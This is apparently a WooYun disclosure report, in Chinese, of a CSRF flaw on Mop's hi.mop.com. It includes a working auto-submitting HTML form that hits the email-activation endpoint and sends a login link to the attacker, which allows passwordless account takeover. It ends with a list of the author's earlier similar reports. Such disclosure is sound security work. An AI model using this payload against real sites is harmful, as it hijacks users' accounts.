WooYun.org

1.这次这个是第五个例子，都是因为对于快速用户的疏忽导致的
和 WooYun: 乐视网CSRF漏洞可重置任意用户密码 原理一样
2.用第三方帐号登录网站，然后会看到一个邮箱激活的地方，抓包

3.写成一个post表单

<html>
<body>
<form id="csrf" name="csrf" action="http://hi.mop.com/user/profile/sendActiveEmail" method="POST">
<input type="text" name="email" value="[email protected]" />
<script>
	document.csrf.submit();
</script>
</body>
</html>

4.当用户的访问表单的时候，会往[email protected]发送一封激活邮箱的邮件
但是并不会更改用户的邮箱，而是直接登录用户帐号，所以说，只要对方访问表单，我就得到一个连接，然后就能不用密码登录他的帐号，如图(我用两个浏览器测试，因为效果比较明显)
①.现在是360极速浏览器登录帐号

②.访问表单。

③.打开火狐浏览器登录QQ邮箱，可以看到已经接受到邮件了，这个时候火狐浏览器的猫扑帐号没有登录，如图

④.邮件里面的连接

⑤。访问连接，看吧，在访问连接的时候，火狐浏览器已经成功登录对方的帐号了

⑥.看吧，最后效果，就是，对方访问了CSRF连接，这个时候邮件把连接发到我的邮箱，我只要访问那个连接，就能登录对方帐号了.............................

-----------------------------------------------------------------------------------
以前提交的漏洞，加上这次，算起来应该是第五次了，都是因为忽视快了速登录导致的，虽然效果不一样，但是实现的原理基本是一样，利用的就是一些厂家对快速登录帐号的忽视

①. WooYun: 爱拍原创视频网csrf任意用户密码重置漏洞 (这个是因为快速登录之后接口校验不严格)
②. WooYun: 百度传课物理路径泄漏 (这个也是因为快速登录接口校验不严格)
③. WooYun: 乐视网CSRF漏洞可重置任意用户密码 (这个额也是因为快速登录接口校验不严格)
④。 WooYun: 凤凰网首页XSS Rookit可向用户推送广告(影响多个分站) （这个也是因为对快速登录校验不严格，随便创建无用的数据）